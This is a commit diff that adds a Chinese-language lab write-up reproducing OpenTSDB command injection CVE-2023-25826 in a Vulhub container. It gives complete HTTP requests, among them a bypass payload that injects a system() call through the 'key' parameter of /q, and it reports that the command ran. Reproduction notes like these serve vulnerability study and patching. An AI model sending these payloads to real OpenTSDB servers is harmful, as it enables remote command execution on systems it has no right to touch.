|
| 1 | +# OpenTSDB 命令注入漏洞 CVE-2023-25826 |
| 2 | + |
| 3 | +## 漏洞描述 |
| 4 | + |
| 5 | +OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。 |
| 6 | + |
| 7 | +参考链接: |
| 8 | + |
| 9 | +- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/) |
| 10 | +- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275) |
| 11 | + |
| 12 | +## 环境搭建 |
| 13 | + |
| 14 | +Vulhub 执行如下命令启动一个 OpenTSDB 2.4.1: |
| 15 | + |
| 16 | +``` |
| 17 | +docker-compose up -d |
| 18 | +``` |
| 19 | + |
| 20 | +服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。 |
| 21 | + |
| 22 | + |
| 23 | + |
| 24 | +## 漏洞复现 |
| 25 | + |
| 26 | +这之前的都和 CVE-2020-35476 一致,也是需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表。 |
| 27 | + |
| 28 | +这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以也可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录: |
| 29 | + |
| 30 | +``` |
| 31 | +POST /api/put/ HTTP/1.1 |
| 32 | +Host: your-ip:4242 |
| 33 | +Accept-Encoding: gzip, deflate |
| 34 | +Accept: */* |
| 35 | +Accept-Language: en |
| 36 | +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
| 37 | +Content-Type: application/x-www-form-urlencoded |
| 38 | +Connection: close |
| 39 | +Content-Length: 150 |
| 40 | +
|
| 41 | +{ |
| 42 | + "metric": "sys.cpu.nice", |
| 43 | + "timestamp": 972388800, |
| 44 | + "value": 20, |
| 45 | + "tags": { |
| 46 | + "host": "web01", |
| 47 | + "dc": "lga" |
| 48 | + } |
| 49 | +} |
| 50 | +``` |
| 51 | + |
| 52 | + |
| 53 | + |
| 54 | +如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。 |
| 55 | + |
| 56 | +发送 CVE-2020-35476 payload : |
| 57 | + |
| 58 | +``` |
| 59 | +GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 |
| 60 | +Host: your-ip:4242 |
| 61 | +Upgrade-Insecure-Requests: 1 |
| 62 | +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 |
| 63 | +Accept-Encoding: gzip, deflate |
| 64 | +Accept: */* |
| 65 | +Accept-Language: en |
| 66 | +Connection: close |
| 67 | +``` |
| 68 | + |
| 69 | +将返回错误: |
| 70 | + |
| 71 | +``` |
| 72 | +{"err":"'yrange' was invalid. Must be in the format [min:max]."} |
| 73 | +``` |
| 74 | + |
| 75 | + |
| 76 | + |
| 77 | +CVE-2023-25826 绕过修复的一个点,在参数 key 这里: |
| 78 | + |
| 79 | +```shell |
| 80 | +# CVE-2020-35476 |
| 81 | +/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json |
| 82 | + |
| 83 | +# CVE-2023-25826 |
| 84 | +/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json |
| 85 | +``` |
| 86 | + |
| 87 | +发送数据包: |
| 88 | + |
| 89 | +``` |
| 90 | +GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 |
| 91 | +Host: your-ip:4242 |
| 92 | +Upgrade-Insecure-Requests: 1 |
| 93 | +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 |
| 94 | +Accept-Encoding: gzip, deflate |
| 95 | +Accept: */* |
| 96 | +Accept-Language: en |
| 97 | +Connection: close |
| 98 | +``` |
| 99 | + |
| 100 | + |
| 101 | + |
| 102 | +进入容器中可见 `touch /tmp/awesome_poc` 已成功执行: |
| 103 | + |
| 104 | + |
0 commit comments